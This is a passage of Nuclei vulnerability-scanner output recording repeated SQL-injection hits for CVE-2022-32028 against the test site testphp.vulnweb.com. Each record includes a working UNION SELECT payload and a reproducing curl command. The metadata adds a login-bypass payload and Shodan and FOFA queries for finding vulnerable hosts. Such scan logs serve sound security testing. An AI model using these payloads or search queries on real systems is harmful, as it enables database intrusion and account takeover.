/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:02 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:02.904422742Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/536.12.27 (KHTML, like Gecko) Version/9.1.2 Safari/536.12.27\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:03 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:03.891721089Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/536.12.27 (KHTML, like Gecko) Version/9.1.2 Safari/536.12.27' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/A01\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:03 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:03.924544237Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/A01/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:04 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:04.90171184Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:04 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:04.913345636Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:120.0) Gecko/20100101 Firefox/120.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:04 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:04.933552281Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\",\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"]},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-2/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:04 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:04.942417319Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.7.20' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car Rental Management System 1.0 contains an SQL injection vulnerability via /admin/manage_user.php?id=. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\\n\",\"impact\":\"Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\\n\",\"reference\":[\"https://github.com/k0xx11/bug_report/blob/main/vendors/campcodes.com/car-rental-management-system/SQLi-8.md\",\"https://nvd.nist.gov/vuln/detail/CVE-2022-32028\",\"https://github.com/ARPSyndicate/kenzer-templates\"],\"severity\":\"high\",\"metadata\":{\"product\":\"car_rental_management_system\",\"shodan-query\":[\"http.html:\\\"Car Rental Management System\\\"\",\"http.html:\\\"car rental management system\\\"\"],\"fofa-query\":\"body=\\\"car rental management system\\\"\",\"comment\":\"Login bypass is also possible using the payload - admin'+or+'1'%3D'1' in username.\",\"verified\":true,\"max-request\":2,\"vendor\":\"car_rental_management_system_project\"},\"classification\":{\"cve-id\":[\"cve-2022-32028\"],\"cwe-id\":[\"cwe-89\"],\"cvss-metrics\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"cvss-score\":7.2,\"epss-score\":0.01593,\"epss-percentile\":0.87356,\"cpe\":\"cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:*\"},\"remediation\":\"Upgrade to the latest version to mitigate this vulnerability.\\n\"},\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-3/3L\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+ HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\\r\\nConnection: close\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:05 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003cdiv\\u003eThanks for buying \\u003cb\\u003e c8c605999f3d8352d7bb792cf3fdb25b\\u003c/b\\u003e\\u003cbr\\u003e\\u003cbr\\u003e\\u003c/div\\u003e\\r\\n\\t\\t\\t\\t\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:05.894660219Z\",\"curl-command\":\"curl -X 'GET' -d '' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L/admin/manage_user.php?id=-1%20union%20select%201,md5(999999999),3,4,5--+'\",\"matcher-status\":true}\n{\"template\":\"http/cves/2022/CVE-2022-32028.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/CVE-2022-32028\",\"template-id\":\"CVE-2022-32028\",\"template-path\":\"/home/rengine/nuclei-templates/http/cves/2022/CVE-2022-32028.yaml\",\"info\":{\"name\":\"Car Rental Management System 1.0 - SQL Injection\",\"author\":[\"arafatansari\"],\"tags\":[\"cve\",\"cve2022\",\"carrental\",\"cms\",\"sqli\",\"authenticated\",\"car_rental_management_system_project\"],\"description\":\"Car 